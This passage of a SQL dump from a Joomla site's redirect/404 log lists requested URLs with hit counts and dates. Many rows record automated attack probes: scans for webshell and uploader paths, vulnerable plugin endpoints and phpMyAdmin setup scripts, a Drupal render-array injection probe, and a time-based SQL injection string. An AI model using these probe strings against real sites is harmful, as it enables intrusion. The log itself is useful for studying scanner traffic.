00:07:33','0000-00-00 00:00:00',301),(20959,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-formgenerator/uploads/php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-formgenerator/uploads/php/','',1,0,'2018-08-31 15:14:00','0000-00-00 00:00:00',301),(20960,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?language=en-gb&ordering',NULL,'','',1,0,'2018-09-01 09:07:09','0000-00-00 00:00:00',301),(20961,'http://3s-technologies.com.tr/tr//administrator/manifests/files/joomla.xml',NULL,'http://sucuri.net','',1,0,'2018-09-01 09:54:20','0000-00-00 00:00:00',301),(20962,'http://3s-technologies.com.tr/tr//language/en-gb/en-gb.ini',NULL,'http://sucuri.net','',1,0,'2018-09-01 09:54:24','0000-00-00 00:00:00',301),(20963,'http://3s-technologies.com.tr/tr//media/system/js/caption.js',NULL,'http://sucuri.net','',1,0,'2018-09-01 09:54:27','0000-00-00 00:00:00',301),(20964,'http://3s-technologies.com.tr/tr//media/media/js/mediamanager.js',NULL,'http://sucuri.net','',1,0,'2018-09-01 09:54:31','0000-00-00 00:00:00',301),(20965,'http://3s-technologies.com.tr/tr//modules/custom.xml',NULL,'http://sucuri.net','',1,0,'2018-09-01 09:54:43','0000-00-00 00:00:00',301),(20966,'http://3s-technologies.com.tr/tr//includes/js/joomla.javascript.js',NULL,'http://sucuri.net','',1,0,'2018-09-01 09:54:49','0000-00-00 00:00:00',301),(20967,'http://3s-technologies.com.tr/tr//mambots/editors/tinymce/jscripts/tiny_mce/plugins/flash/editor_plugin.js',NULL,'http://sucuri.net','',1,0,'2018-09-01 09:54:50','0000-00-00 00:00:00',301),(20968,'http://3s-technologies.com.tr/tr/404testpage4525d2fdc',NULL,'http://sucuri.net','',1,0,'2018-09-01 09:55:18','0000-00-00 00:00:00',301),(20969,'http://3s-technologies.com.tr/tr/404javascript.js',NULL,'http://www.google.com/url/?sa=t','',1,0,'2018-09-01 09:55:19','0000-00-00 00:00:00',301),(20970,'http://www.3s-technologies.com.tr/tr/images/jsspwned.php',NULL,'','',1,0,'2018-09-01 14:47:43','0000-00-00 00:00:00',301),(20971,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-09-02 05:07:04','0000-00-00 00:00:00',301),(20972,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by?language=en-gb&product_sku',NULL,'','',2,0,'2018-09-02 06:56:34','0000-00-00 00:00:00',301),(20973,'https://www.3s-technologies.com.tr:443/tr/c<rc<nler/user',NULL,'','',2,0,'2018-09-02 12:38:58','0000-00-00 00:00:00',301),(20974,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by?language=en-gb&product_sku',NULL,'','',1,0,'2018-09-02 23:07:02','0000-00-00 00:00:00',301),(20975,'http://3s-technologies.com.tr/tr//connectors/system/phpthumb.php',NULL,'','',1,0,'2018-09-03 07:52:34','0000-00-00 00:00:00',301),(20976,'http://3s-technologies.com.tr/tr//dbs.php',NULL,'','',1,0,'2018-09-03 07:52:34','0000-00-00 00:00:00',301),(20977,'http://www.3s-technologies.com.tr/index.php/en/products/cm-602-l-detail?print=1&tmpl=component',NULL,'','',1,0,'2018-09-03 22:27:46','0000-00-00 00:00:00',301),(20978,'http://3s-technologies.com.tr/en/component/ban',NULL,'','',1,0,'2018-09-04 17:46:11','0000-00-00 00:00:00',301),(20979,'http://3s-technologies.com.tr/wp-check.php',NULL,'','',6,0,'2018-09-06 00:20:54','0000-00-00 00:00:00',301),(20980,'http://www.3s-technologies.com.tr/en/license.php',NULL,'','',3,0,'2018-09-06 12:25:55','0000-00-00 00:00:00',301),(20981,'http://3s-technologies.com.tr/tr/modules/mod_feed/tmpl/mod_feed.php?ms-load=tgyijk',NULL,'','',7,0,'2018-09-06 16:24:13','0000-00-00 00:00:00',301),(20982,'http://3s-technologies.com.tr/indax.php',NULL,'','',5,0,'2018-09-06 17:35:38','0000-00-00 00:00:00',301),(20983,'http://3s-technologies.com.tr/user/password?name[#post_render][0]=printf&name[#markup]=abcz\n',NULL,'','',3,0,'2018-09-06 21:14:09','0000-00-00 00:00:00',301),(20984,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/contacts/index.php',NULL,'http://proneo-led.com/index.php','',1,0,'2018-09-07 03:55:47','0000-00-00 00:00:00',301),(20985,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-fırın/by?language=en-gb&mf_name',NULL,'','',1,0,'2018-09-07 07:14:51','0000-00-00 00:00:00',301),(20986,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',4,0,'2018-09-07 17:42:38','0000-00-00 00:00:00',301),(20987,'http://www.3s-technologies.com.tr/tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'','',1,0,'2018-09-08 23:01:28','0000-00-00 00:00:00',301),(20988,'http://3s-technologies.com.tr/maps.php',NULL,'','',5,0,'2018-09-09 03:48:07','0000-00-00 00:00:00',301),(20989,'http://www.3s-technologies.com.tr/tr/wp-admin/install.php',NULL,'','',12,0,'2018-09-09 06:42:10','0000-00-00 00:00:00',301),(20990,'http://www.3s-technologies.com.tr/tr/wp/wp-admin/install.php',NULL,'','',3,0,'2018-09-09 06:42:15','0000-00-00 00:00:00',301),(20991,'http://www.3s-technologies.com.tr/tr/wordpress/wp-admin/install.php',NULL,'','',4,0,'2018-09-09 06:42:16','0000-00-00 00:00:00',301),(20992,'http://www.3s-technologies.com.tr/tr/old/wp-admin/install.php',NULL,'','',3,0,'2018-09-09 06:42:29','0000-00-00 00:00:00',301),(20993,'http://www.3s-technologies.com.tr/tr/oldsite/wp-admin/install.php',NULL,'','',3,0,'2018-09-09 06:42:35','0000-00-00 00:00:00',301),(20994,'http://3s-technologies.com.tr/imprima.php',NULL,'','',4,0,'2018-09-09 08:51:45','0000-00-00 00:00:00',301),(20995,'http://3s-technologies.com.tr/ludk.php',NULL,'','',4,0,'2018-09-09 21:10:02','0000-00-00 00:00:00',301),(20996,'http://3s-technologies.com.tr/wp-version.php',NULL,'','',5,0,'2018-09-10 02:32:20','0000-00-00 00:00:00',301),(20997,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name/results,1-10',NULL,'','',1,0,'2018-09-10 03:21:00','0000-00-00 00:00:00',301),(20998,'http://3s-technologies.com.tr/wp-content_plugins_akismet_widget.php',NULL,'','',4,0,'2018-09-10 11:34:54','0000-00-00 00:00:00',301),(20999,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/user/editaddresscartbt',NULL,'','',1,0,'2018-09-10 21:04:11','0000-00-00 00:00:00',301),(21000,'http://www.3s-technologies.com.tr/user/password?name[#post_render][0]=printf&name[#markup]=abcz\n',NULL,'','',2,0,'2018-09-11 07:31:32','0000-00-00 00:00:00',301),(21001,'http://www.3s-technologies.com.tr/user/register?element_parents=account/mail/#value&ajax_form=1&_wrapper_format=drupal_ajax',NULL,'','',2,0,'2018-09-11 07:31:33','0000-00-00 00:00:00',301),(21002,'http://www.3s-technologies.com.tr/en/wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php','',3,0,'2018-09-11 07:45:58','0000-00-00 00:00:00',301),(21003,'http://3s-technologies.com.tr/marvin.php',NULL,'','',5,0,'2018-09-11 23:30:16','0000-00-00 00:00:00',301),(21004,'http://3s-technologies.com.tr/wp_honor.php',NULL,'','',4,0,'2018-09-12 04:23:52','0000-00-00 00:00:00',301),(21005,'http://3s-technologies.com.tr/wp-blog-config.php',NULL,'','',4,0,'2018-09-12 11:25:43','0000-00-00 00:00:00',301),(21006,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,6-15',NULL,'','',8,0,'2018-09-12 17:33:57','0000-00-00 00:00:00',301),(21007,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,6-25',NULL,'','',18,0,'2018-09-12 17:39:04','0000-00-00 00:00:00',301),(21008,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/dirdesc/results,6-55',NULL,'','',12,0,'2018-09-12 17:44:20','0000-00-00 00:00:00',301),(21009,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,6-55',NULL,'','',14,0,'2018-09-12 17:50:07','0000-00-00 00:00:00',301),(21010,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2018-09-12 17:54:45','0000-00-00 00:00:00',301),(21011,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku/results,6-55',NULL,'','',13,0,'2018-09-12 18:02:30','0000-00-00 00:00:00',301),(21012,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,ordering/results,1-10',NULL,'','',1,0,'2018-09-12 18:29:13','0000-00-00 00:00:00',301),(21013,'http://www.3s-technologies.com.tr/tr/modules/mod_ppc_simple_spotlight/elements/upload_file.php',NULL,'','',3,0,'2018-09-12 20:49:04','0000-00-00 00:00:00',301),(21014,'http://3s-technologies.com.tr/phqmv.php',NULL,'','',6,0,'2018-09-13 00:37:42','0000-00-00 00:00:00',301),(21015,'http://www.3s-technologies.com.tr/en/wp-content/plugins/fluid_forms/file-upload/server/php/index.php',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/fluid_forms/file-upload/server/php/index.php','',4,0,'2018-09-13 02:11:45','0000-00-00 00:00:00',301),(21016,'http://3s-technologies.com.tr/infos.php',NULL,'','',5,0,'2018-09-13 13:59:41','0000-00-00 00:00:00',301),(21017,'http://3s-technologies.com.tr/error-logs.php',NULL,'','',5,0,'2018-09-13 19:27:12','0000-00-00 00:00:00',301),(21018,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2018-09-13 21:24:17','0000-00-00 00:00:00',301),(21019,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-09-14 04:40:39','0000-00-00 00:00:00',301),(21020,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/results,6-10',NULL,'','',12,0,'2018-09-14 04:48:39','0000-00-00 00:00:00',301),(21021,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2018-09-14 05:03:01','0000-00-00 00:00:00',301),(21022,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/results,6-55',NULL,'','',13,0,'2018-09-14 07:32:25','0000-00-00 00:00:00',301),(21023,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,6-55',NULL,'','',17,0,'2018-09-14 08:06:56','0000-00-00 00:00:00',301),(21024,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku/results,6-10',NULL,'','',11,0,'2018-09-14 08:38:29','0000-00-00 00:00:00',301),(21025,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_sku/results,1-50',NULL,'','',1,0,'2018-09-14 10:01:48','0000-00-00 00:00:00',301),(21026,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name/results,6-10',NULL,'','',10,0,'2018-09-14 15:32:06','0000-00-00 00:00:00',301),(21027,'http://3s-technologies.com.tr/en/?option=com_user&task=register',NULL,'','',1,0,'2018-09-14 17:11:04','0000-00-00 00:00:00',301),(21028,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/results,6-10',NULL,'','',11,0,'2018-09-15 02:30:55','0000-00-00 00:00:00',301),(21029,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2018-09-15 03:31:22','0000-00-00 00:00:00',301),(21030,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-09-15 04:47:38','0000-00-00 00:00:00',301),(21031,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by?language=en-gb&product_name',NULL,'','',1,0,'2018-09-15 19:55:16','0000-00-00 00:00:00',301),(21032,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/dirdesc/results,1-20',NULL,'','',1,0,'2018-09-16 17:47:48','0000-00-00 00:00:00',301),(21033,'http://3s-technologies.com.tr/tr/rss.xml',NULL,'','',4,0,'2018-09-16 19:06:18','0000-00-00 00:00:00',301),(21034,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/load.php',NULL,'','',1,0,'2018-09-16 19:06:25','0000-00-00 00:00:00',301),(21035,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,category_name/results,1-40',NULL,'','',1,0,'2018-09-16 20:02:42','0000-00-00 00:00:00',301),(21036,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/results,1-5',NULL,'','',5,0,'2018-09-16 20:09:14','0000-00-00 00:00:00',301),(21037,'http://3s-technologies.com.tr/tr/xsamxadoo.txt',NULL,'','',1,0,'2018-09-16 21:16:16','0000-00-00 00:00:00',301),(21038,'http://3s-technologies.com.tr/tr/media/uploader.php',NULL,'','',1,0,'2018-09-17 00:13:16','0000-00-00 00:00:00',301),(21039,'http://www.3s-technologies.com.tr/index.php/en/products/le-40v-detail?print=1&tmpl=component',NULL,'','',1,0,'2018-09-17 01:09:08','0000-00-00 00:00:00',301),(21040,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,category_name/results,1-10',NULL,'','',1,0,'2018-09-17 03:45:53','0000-00-00 00:00:00',301),(21041,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/results,6-25',NULL,'','',8,0,'2018-09-17 06:21:03','0000-00-00 00:00:00',301),(21042,'http://www.3s-technologies.com.tr/tr/images/def.gif',NULL,'','',4,0,'2018-09-17 06:45:07','0000-00-00 00:00:00',301),(21043,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,product_sku/results,1-10',NULL,'','',1,0,'2018-09-17 11:06:37','0000-00-00 00:00:00',301),(21044,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2018-09-17 11:11:10','0000-00-00 00:00:00',301),(21045,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/results,6-55',NULL,'','',4,0,'2018-09-17 16:15:57','0000-00-00 00:00:00',301),(21046,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,6-10',NULL,'','',4,0,'2018-09-17 17:51:30','0000-00-00 00:00:00',301),(21047,'http://www.3s-technologies.com.tr/index.php?option=com_content\'a=0&view=article&id=72&itemid=78&lang=tr',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_content\'A=0&view=article&id=72&Itemid=78&lang=tr','',1,0,'2018-09-17 19:36:16','0000-00-00 00:00:00',301),(21048,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article\'a=0&id=72&itemid=78&lang=tr',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article\'A=0&id=72&Itemid=78&lang=tr','',1,0,'2018-09-17 19:36:18','0000-00-00 00:00:00',301),(21049,'http://www.3s-technologies.com.tr/en/?option=com_content&view=article&id=72&itemid=78&lang=tr\'a=0',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=72&Itemid=78&lang=tr\'A=0','',1,0,'2018-09-17 19:36:34','0000-00-00 00:00:00',301),(21050,'http://www.3s-technologies.com.tr/en/templates/beez5/favicon.ico',NULL,'','',1,0,'2018-09-17 22:23:40','0000-00-00 00:00:00',301),(21051,'http://3s-technologies.com.tr/tr/contact-us',NULL,'','',3,0,'2018-09-18 05:17:38','0000-00-00 00:00:00',301),(21052,'http://3s-technologies.com.tr/tr/contact',NULL,'','',14,0,'2018-09-18 05:17:53','0000-00-00 00:00:00',301),(21053,'http://3s-technologies.com.tr/tr/contact-page',NULL,'','',1,0,'2018-09-18 05:18:04','0000-00-00 00:00:00',301),(21054,'http://3s-technologies.com.tr/tr/contacts',NULL,'','',2,0,'2018-09-18 05:18:15','0000-00-00 00:00:00',301),(21055,'http://3s-technologies.com.tr/tr/contacts.php',NULL,'','',27,0,'2018-09-18 05:18:26','0000-00-00 00:00:00',301),(21056,'http://3s-technologies.com.tr/tr/contact.php',NULL,'','',38,0,'2018-09-18 05:18:28','0000-00-00 00:00:00',301),(21057,'http://3s-technologies.com.tr/tr/contact.html',NULL,'','',2,0,'2018-09-18 05:18:29','0000-00-00 00:00:00',301),(21058,'http://3s-technologies.com.tr/tr/contact.htm',NULL,'','',1,0,'2018-09-18 05:18:31','0000-00-00 00:00:00',301),(21059,'http://3s-technologies.com.tr/tr/contacts.html',NULL,'','',2,0,'2018-09-18 05:18:37','0000-00-00 00:00:00',301),(21060,'http://3s-technologies.com.tr/tr/contacts.htm',NULL,'','',2,0,'2018-09-18 05:18:44','0000-00-00 00:00:00',301),(21061,'http://3s-technologies.com.tr/tr/contact-us.html',NULL,'','',2,0,'2018-09-18 05:18:47','0000-00-00 00:00:00',301),(21062,'http://3s-technologies.com.tr/tr/kontakt',NULL,'','',1,0,'2018-09-18 05:18:49','0000-00-00 00:00:00',301),(21063,'http://3s-technologies.com.tr/tr/kontakt.htm',NULL,'','',1,0,'2018-09-18 05:18:52','0000-00-00 00:00:00',301),(21064,'http://3s-technologies.com.tr/tr/kontakt.html',NULL,'','',1,0,'2018-09-18 05:18:53','0000-00-00 00:00:00',301),(21065,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/dirdesc/results,6-10',NULL,'','',6,0,'2018-09-18 13:05:38','0000-00-00 00:00:00',301),(21066,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name/results,6-55',NULL,'','',6,0,'2018-09-18 13:41:01','0000-00-00 00:00:00',301),(21067,'http://www.3s-technologies.com.tr/tr/index.htm',NULL,'','',18,0,'2018-09-18 17:47:50','0000-00-00 00:00:00',301),(21068,'http://3s-technologies.com.tr/en/search?controller=search&orderby=position&orderway=desc&search_query=1%\'+and+sleep(10)#&submit_search=1\'',NULL,'http://3s-technologies.com.tr/en/search?controller=search&orderby=position&orderway=desc&search_query=1%25%27+AND+SLEEP%2810%29%23&submit_search=1\'','',1,0,'2018-09-18 17:50:04','0000-00-00 00:00:00',301),(21069,'http://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2018-09-18 20:56:25','0000-00-00 00:00:00',301),(21070,'http://3s-technologies.com.tr/tr/��r��nler/smd-d������k-h��zl��',NULL,'','',4,0,'2018-09-18 20:56:27','0000-00-00 00:00:00',301),(21071,'http://3s-technologies.com.tr/tr/��r��nler/manufacturers/mirae',NULL,'','',5,0,'2018-09-18 20:56:29','0000-00-00 00:00:00',301),(21072,'http://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��/am100-detail',NULL,'','',4,0,'2018-09-18 21:18:06','0000-00-00 00:00:00',301),(21073,'http://3s-technologies.com.tr/tr/��r��nler/manufacturers/ddm-novastar',NULL,'','',6,0,'2018-09-18 21:29:49','0000-00-00 00:00:00',301),(21074,'http://3s-technologies.com.tr/tr/��r��nler/smd-orta-h��zl��/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2018-09-18 21:36:21','0000-00-00 00:00:00',301),(21075,'http://3s-technologies.com.tr/tr/��r��nler/lehimleme-malzemeleri/��ubuk-lehim',NULL,'','',5,0,'2018-09-18 21:43:04','0000-00-00 00:00:00',301),(21076,'http://3s-technologies.com.tr/tr/��r��nler/lehimleme-malzemeleri/tel-lehim',NULL,'','',5,0,'2018-09-18 21:48:43','0000-00-00 00:00:00',301),(21077,'http://3s-technologies.com.tr/tr/��r��nler/lehimleme-malzemeleri/flux',NULL,'','',7,0,'2018-09-18 21:55:25','0000-00-00 00:00:00',301),(21078,'http://3s-technologies.com.tr/tr/hakk��m��zda',NULL,'','',6,0,'2018-09-18 21:56:47','0000-00-00 00:00:00',301),(21079,'http://www.3s-technologies.com.tr/tr/sites/default/files/payload.php',NULL,'','',2,0,'2018-09-19 03:25:12','0000-00-00 00:00:00',301),(21080,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail',NULL,'','',1,0,'2018-09-19 05:27:37','0000-00-00 00:00:00',301),(21081,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-mobile-detector/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-mobile-detector/readme.txt','',4,0,'2018-09-19 09:49:04','0000-00-00 00:00:00',301),(21082,'http://3s-technologies.com.tr/components/thumbsj3tmp/ht/img.resize0644.php',NULL,'3s-technologies.com.tr','',2,0,'2018-09-20 03:19:09','0000-00-00 00:00:00',301),(21083,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/dirdesc/results,1-10',NULL,'','',1,0,'2018-09-21 12:12:15','0000-00-00 00:00:00',301),(21084,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/pdf/le_benchtop_automated_pick-place.pdf',NULL,'','',8,0,'2018-09-21 18:30:41','0000-00-00 00:00:00',301),(21085,'http://www.3s-technologies.com.tr/tr/media/baws.php.txt',NULL,'','',1,0,'2018-09-22 01:12:35','0000-00-00 00:00:00',301),(21086,'http://www.3s-technologies.com.tr/tr/media/baws.txt',NULL,'','',1,0,'2018-09-22 01:12:36','0000-00-00 00:00:00',301),(21087,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku/results,6-10',NULL,'','',20,0,'2018-09-22 12:32:01','0000-00-00 00:00:00',301),(21088,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/results,6-10?language=en-gb',NULL,'','',1,0,'2018-09-22 12:43:31','0000-00-00 00:00:00',301),(21089,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku/results,1-5?language=en-gb',NULL,'','',13,0,'2018-09-22 13:20:51','0000-00-00 00:00:00',301),(21090,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,`p`.product_sku/dirdesc/results,6-10?language=en-gb',NULL,'','',10,0,'2018-09-22 13:36:07','0000-00-00 00:00:00',301),(21091,'http://3s-technologies.com.tr/tr/?option=com_easybook',NULL,'http://3s-technologies.com.tr/tr/?option=com_easybook','',1,0,'2018-09-22 17:30:28','0000-00-00 00:00:00',301),(21092,'http://www.3s-technologies.com.tr/tr/english/index.htm',NULL,'','',17,0,'2018-09-23 02:11:57','0000-00-00 00:00:00',301),(21093,'https://3s-technologies.com.tr/tr/phpmyadmin',NULL,'','',7,0,'2018-09-23 03:07:18','0000-00-00 00:00:00',301),(21094,'http://3s-technologies.com.tr/tr/hakk?m?zda',NULL,'','',2,0,'2018-09-23 04:07:17','0000-00-00 00:00:00',301),(21095,'http://3s-technologies.com.tr/index.php/en/products/smd-f闁荤姴顑呴悰浼存偣鐎ｎ亞宕 /by,`p`.product_sku/',NULL,'','',5,0,'2018-09-23 05:39:08','0000-00-00 00:00:00',301),(21096,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,6-10',NULL,'','',4,0,'2018-09-23 12:47:50','0000-00-00 00:00:00',301),(21097,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/results,1-5',NULL,'','',15,0,'2018-09-23 12:56:27','0000-00-00 00:00:00',301),(21098,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,1-20',NULL,'','',4,0,'2018-09-23 13:28:03','0000-00-00 00:00:00',301),(21099,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/results,1-5',NULL,'','',6,0,'2018-09-23 14:22:40','0000-00-00 00:00:00',301),(21100,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,1-5',NULL,'','',11,0,'2018-09-23 14:45:41','0000-00-00 00:00:00',301),(21101,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku/results,1-5',NULL,'','',15,0,'2018-09-23 15:36:01','0000-00-00 00:00:00',301),(21102,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name/results,1-5',NULL,'','',13,0,'2018-09-23 16:11:52','0000-00-00 00:00:00',301),(21103,'https://3s-technologies.com.tr/tr/console',NULL,'','',3,0,'2018-09-23 16:32:35','0000-00-00 00:00:00',301),(21104,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',13,0,'2018-09-23 17:15:56','0000-00-00 00:00:00',301),(21105,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,1-10',NULL,'','',2,0,'2018-09-24 02:10:48','0000-00-00 00:00:00',301),(21106,'http://www.3s-technologies.com.tr/en/products/smd-orta-hızlı/results,1-5',NULL,'','',1,0,'2018-09-25 06:59:49','0000-00-00 00:00:00',301),(21107,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/dirdesc/results,1-10',NULL,'','',1,0,'2018-09-25 07:32:35','0000-00-00 00:00:00',301),(21108,'http://www.3s-technologies.com.tr/en/wp-content/themes/rightnow/includes/uploadify/upload_settings_image.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','',4,0,'2018-09-25 15:36:37','0000-00-00 00:00:00',301),(21109,'http://3s-technologies.com.tr/tr/console',NULL,'','',3,0,'2018-09-25 17:25:00','0000-00-00 00:00:00',301),(21110,'http://www.3s-technologies.com.tr/tr/content-post.php',NULL,'','',1,0,'2018-09-25 22:16:25','0000-00-00 00:00:00',301),(21111,'http://3s-technologies.com.tr/tr/phpmyadmin/scripts/setup.php',NULL,'','',32,0,'2018-09-26 01:02:24','0000-00-00 00:00:00',301),(21112,'http://3s-technologies.com.tr/tr/struts_stru',NULL,'','',2,0,'2018-09-26 01:02:27','0000-00-00 00:00:00',301),(21113,'http://3s-technologies.com.tr/tr/plugins/editors/jckeditor/plugins/jtreelink/dialogs/jtreelink.js',NULL,'','',1,0,'2018-09-26 13:43:02','0000-00-00 00:00:00',301),(21114,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,6-55',NULL,'','',7,0,'2018-09-26 21:22:38','0000-00-00 00:00:00',301),(21115,'http://www.3s-technologies.com.tr/en/wp-content/themes/purevision/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/purevision/style.css','',5,0,'2018-09-27 03:02:01','0000-00-00 00:00:00',301),(21116,'http://3s-technologies.com.tr/tr/scripts/setup.php',NULL,'','',8,0,'2018-09-27 04:05:52','0000-00-00 00:00:00',301),(21117,'http://3s-technologies.com.tr/tr/pma/scripts/setup.php',NULL,'','',7,0,'2018-09-27 04:05:55','0000-00-00 00:00:00',301),(21118,'http://3s-technologies.com.tr/tr/xmlrpc.php',NULL,'','',319,0,'2018-09-27 04:05:56','0000-00-00 00:00:00',301),(21119,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/dirdesc/results,6-55',NULL,'','',8,0,'2018-09-27 07:42:30','0000-00-00 00:00:00',301),(21120,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/home2/81-english-uk/english-content',NULL,'','',4,0,'2018-09-27 10:06:04','0000-00-00 00:00:00',301),(21121,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/dirdesc/results,6-15',NULL,'','',4,0,'2018-09-27 11:00:46','0000-00-00 00:00:00',301),(21122,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/results,1-40?error=404',NULL,'','',1,0,'2018-09-27 11:09:44','0000-00-00 00:00:00',301),(21123,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/dirdesc/results,6-25',NULL,'','',4,0,'2018-09-27 12:26:49','0000-00-00 00:00:00',301),(21124,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/results,1-100?error=404',NULL,'','',1,0,'2018-09-27 12:32:34','0000-00-00 00:00:00',301),(21125,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/results,1-10?error=404',NULL,'','',1,0,'2018-09-27 12:41:11','0000-00-00 00:00:00',301),(21126,'http://3s-technologies.com.tr/index.php/en/products/b枚lgesel-lehimleme/by,mf_name/',NULL,'','',1,0,'2018-09-27 